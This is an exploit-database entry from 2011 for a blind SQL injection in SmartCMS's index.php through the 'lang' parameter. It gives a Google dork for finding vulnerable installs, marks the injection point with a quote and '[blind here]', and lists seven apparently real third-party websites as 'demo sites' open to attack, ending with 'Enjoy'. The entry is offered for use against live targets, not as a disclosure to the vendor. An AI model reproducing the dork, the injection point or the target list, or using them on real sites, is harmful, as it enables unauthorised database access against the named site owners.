SmartCMS (index.php) Blind Sql Injection Vulnerability

2011-07-27T00:00:00
ID 1337DAY-ID-16567
Type zdt
Reporter Angel Injection
Modified 2011-07-27T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title:SmartCMS(index.php)Blind Sql Injection Vulnerability
# Author: Angel Injection
# home Page: http://www.club-h.co.cc
# Email: Angel-Injection[at]hotmail[Dot]com
# Vendor or Software Link:www.smartwebsites.com.cy
# Version: N/A
# Category:: webapps
# Google dork:intext:"powered by SmartCMS" inurl:index.php?pageid=
# Tested on: Linux Back Track 5
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

Exploit

http://localhost/index.php?pageid=1&lang=1'

http://localhost/index.php?pageid=1&lang=1[blind here]

demo sites
http://www.aigaia.com.cy/index.php?pageid=1&lang=1
http://www.demadesdesign.com/index.php?pageid=1&lang=1
http://www.cyprusdance.org/index.php?pageid=1&lang=1
http://www.cgi.com.cy/index.php?pageid=1&lang=1
http://www.esotericwebs.com/index.php?pageid=1&lang=1
http://www.smartwebsites.com.cy/index.php?pageid=1&lang=1
http://www.myfamilydinners.com/index.php?pageid=1&lang=1


Enjoy
-- ------ ---------- ----------- ------- ------------- ------- --------- ------ ----
Thanks to all the people of Iraq And Club Hack Team



#  0day.today [2018-02-19]  #